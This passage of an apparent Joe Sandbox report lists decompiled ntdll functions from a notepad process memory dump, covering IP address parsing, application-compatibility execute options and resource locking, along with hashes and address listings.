                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: a8e4beb2a8a3b7b91674aa0c3aa4d9915c6ad785abc15110231a2d1997320956
                                                  • Instruction ID: 5f2c88084b4e9145beae098e0071b063de707f7d6baac25e20a889b4a2a3facd
                                                  • Opcode Fuzzy Hash: a8e4beb2a8a3b7b91674aa0c3aa4d9915c6ad785abc15110231a2d1997320956
                                                  • Instruction Fuzzy Hash: 4A613CB19046A5AACB34DF5AC8808BF7BF5EF95300754C56EF4E6476C0D334AA40CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AD7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E00AD7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb82088; // 0x7587b8fb
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00AD7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00AF3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00AADFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb84218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00AF3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00AB0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00AF3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00AB8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00AF3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00B1E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00AF3F92();
					_t38 = 1;
					L2:
					return E00AAE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                  0x00ad7f08
                                                  0x00ad7f0f
                                                  0x00ad7f12
                                                  0x00ad7f1b
                                                  0x00ad7f31
                                                  0x00af3ead
                                                  0x00af3eb4
                                                  0x00000000
                                                  0x00000000
                                                  0x00af3eba
                                                  0x00af3ecd
                                                  0x00af3ed2
                                                  0x00af3ee1
                                                  0x00af3ee7
                                                  0x00af3eec
                                                  0x00af3f12
                                                  0x00af3f18
                                                  0x00af3f1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00af3f20
                                                  0x00af3f26
                                                  0x00af3f28
                                                  0x00000000
                                                  0x00000000
                                                  0x00af3f2e
                                                  0x00af3f30
                                                  0x00000000
                                                  0x00000000
                                                  0x00af3f3a
                                                  0x00af3f3b
                                                  0x00af3f53
                                                  0x00af3f64
                                                  0x00af3f69
                                                  0x00af3f6c
                                                  0x00af3f6d
                                                  0x00af3f6f
                                                  0x00afe304
                                                  0x00afe30f
                                                  0x00afe315
                                                  0x00afe31e
                                                  0x00afe321
                                                  0x00afe327
                                                  0x00afe329
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00afe32f
                                                  0x00afe32f
                                                  0x00afe337
                                                  0x00afe33a
                                                  0x00afe33b
                                                  0x00afe33d
                                                  0x00afe33f
                                                  0x00afe341
                                                  0x00afe341
                                                  0x00afe34e
                                                  0x00afe353
                                                  0x00afe358
                                                  0x00afe35d
                                                  0x00afe35f
                                                  0x00000000
                                                  0x00000000
                                                  0x00afe365
                                                  0x00afe365
                                                  0x00afe368
                                                  0x00afe36e
                                                  0x00000000
                                                  0x00000000
                                                  0x00afe374
                                                  0x00afe32f
                                                  0x00af3f75
                                                  0x00af3f7a
                                                  0x00af3f7c
                                                  0x00af3f7e
                                                  0x00af3f86
                                                  0x00ad7f39
                                                  0x00ad7f47
                                                  0x00ad7f47
                                                  0x00ad7f37
                                                  0x00ad7f37
                                                  0x00000000

                                                  APIs
                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AF3F12
                                                  Strings
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AF3EC4
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00AFE2FB
                                                  • Execute=1, xrefs: 00AF3F5E
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00AFE345
                                                  • ExecuteOptions, xrefs: 00AF3F04
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AF3F75
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AF3F4A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: BaseDataModuleQuery
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 3901378454-484625025
                                                  • Opcode ID: ca624eb08c2beab274f8b8ee01f8041a121cabc4dd81f4ccb76863923bab1d64
                                                  • Instruction ID: 47349778f11d4d1eba107799e02a7147ab8455b61e03e7f0fb318e34521b8930
                                                  • Opcode Fuzzy Hash: ca624eb08c2beab274f8b8ee01f8041a121cabc4dd81f4ccb76863923bab1d64
                                                  • Instruction Fuzzy Hash: 93416472A4021C7ADF259B94DC86FEE73BCAB59700F0005A9F606E7191EB709A45CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00AE0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00AB8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00AADFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00AE0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00AE0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00AE06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00AE06BA(_t135, _t178) == 0 || E00AE0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00AE0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00AE0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00AE06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00AE06BA(_t124, _t142) == 0 || E00AE0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                  0x00ae0b21
                                                  0x00ae0b24
                                                  0x00ae0b27
                                                  0x00ae0b2a
                                                  0x00ae0b2d
                                                  0x00ae0b30
                                                  0x00ae0b33
                                                  0x00ae0b36
                                                  0x00ae0b39
                                                  0x00ae0b3e
                                                  0x00ae0c65
                                                  0x00ae0c68
                                                  0x00ae0c6a
                                                  0x00ae0c6f
                                                  0x00b0eb42
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eb48
                                                  0x00b0eb48
                                                  0x00ae0c75
                                                  0x00ae0c7a
                                                  0x00b0eb54
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eb5a
                                                  0x00ae0c80
                                                  0x00ae0c84
                                                  0x00b0eb98
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eba6
                                                  0x00ae0cb8
                                                  0x00ae0cba
                                                  0x00ae0cd3
                                                  0x00ae0cda
                                                  0x00ae0ce4
                                                  0x00ae0ce9
                                                  0x00000000
                                                  0x00ae0cec
                                                  0x00ae0c8c
                                                  0x00b0eb63
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eb70
                                                  0x00b0eb75
                                                  0x00b0eb7d
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eb8c
                                                  0x00000000
                                                  0x00b0eb8c
                                                  0x00ae0c96
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0ca2
                                                  0x00ae0cac
                                                  0x00ae0cb4
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0b44
                                                  0x00ae0b47
                                                  0x00ae0b49
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0b4f
                                                  0x00ae0b50
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0b56
                                                  0x00ae0b62
                                                  0x00ae0b7c
                                                  0x00ae0bac
                                                  0x00ae0a0f
                                                  0x00b0eaaa
                                                  0x00000000
                                                  0x00b0eac4
                                                  0x00b0eac4
                                                  0x00ae0bd0
                                                  0x00ae0bd0
                                                  0x00ae0bd4
                                                  0x00ae0bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0bdb
                                                  0x00ae0be0
                                                  0x00b0eb0e
                                                  0x00ae0a1a
                                                  0x00000000
                                                  0x00ae0a1a
                                                  0x00b0eb1a
                                                  0x00b0eb1f
                                                  0x00b0eb27
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eb36
                                                  0x00000000
                                                  0x00b0eb36
                                                  0x00ae0bea
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0bf6
                                                  0x00ae0c00
                                                  0x00ae0c03
                                                  0x00ae0c0b
                                                  0x00000000
                                                  0x00ae0c0b
                                                  0x00b0eaaa
                                                  0x00000000
                                                  0x00ae0a15
                                                  0x00ae0bb6
                                                  0x00000000
                                                  0x00ae0bc6
                                                  0x00ae0bc6
                                                  0x00ae0bcb
                                                  0x00ae0c15
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0c1d
                                                  0x00ae0c20
                                                  0x00ae0c21
                                                  0x00ae0c24
                                                  0x00ae0c24
                                                  0x00ae0c26
                                                  0x00000000
                                                  0x00ae0c26
                                                  0x00ae0bcd
                                                  0x00000000
                                                  0x00ae0bcd
                                                  0x00ae0b89
                                                  0x00ae0b89
                                                  0x00ae0b90
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0b96
                                                  0x00000000
                                                  0x00ae0b96
                                                  0x00ae0a04
                                                  0x00ae0a04
                                                  0x00ae0b9a
                                                  0x00ae0b9a
                                                  0x00ae0b9b
                                                  0x00ae0b9f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0ba5
                                                  0x00ae0ac7
                                                  0x00ae0aca
                                                  0x00b0eacf
                                                  0x00000000
                                                  0x00b0eade
                                                  0x00b0eade
                                                  0x00b0eae3
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eaf3
                                                  0x00b0eaf6
                                                  0x00b0eaf7
                                                  0x00b0eafe
                                                  0x00b0eb01
                                                  0x00000000
                                                  0x00b0eb01
                                                  0x00b0eacf
                                                  0x00ae0ad0
                                                  0x00ae0ad4
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0ada
                                                  0x00ae0ae6
                                                  0x00ae0c34
                                                  0x00000000
                                                  0x00ae0c47
                                                  0x00ae0c49
                                                  0x00ae0c4a
                                                  0x00ae0c4e
                                                  0x00ae0c51
                                                  0x00ae0c54
                                                  0x00ae0c57
                                                  0x00ae0c5a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae0c60
                                                  0x00ae0afb
                                                  0x00ae0afe
                                                  0x00ae0b02
                                                  0x00ae0b05
                                                  0x00ae0b08
                                                  0x00000000
                                                  0x00ae0b08
                                                  0x00ae0ae6
                                                  0x00ae0b44
                                                  0x00ae09f8
                                                  0x00ae09f8
                                                  0x00ae09f9
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eaa0
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: __fassign
                                                  • String ID: .$:$:
                                                  • API String ID: 3965848254-2308638275
                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                  • Instruction ID: bb91dc64d0d918df621b2e8cd92747829d119911a66881977b280a4c0df3a477
                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                  • Instruction Fuzzy Hash: D8A18D71A0038ADFCB24CF66C845ABEB7B4BF45704F34856AD852A7282D7B49AC1CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E00AE0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b801c0;
									_push(_t144);
									_push(0);
									_t51 = E00A9F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00AE4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00AF3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00AF3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00B2217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00AF3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00AE3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b801c0;
												_push(_t138);
												_push(0);
												_t58 = E00A9F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00AE4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00AF3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00AF3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00B2217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00AF3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00AE3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00AC5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00A9F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00AE3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00A9F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00AE3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00A9F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00AE3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00AC5329(_t110, _t138);
																_t69 = E00AC53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
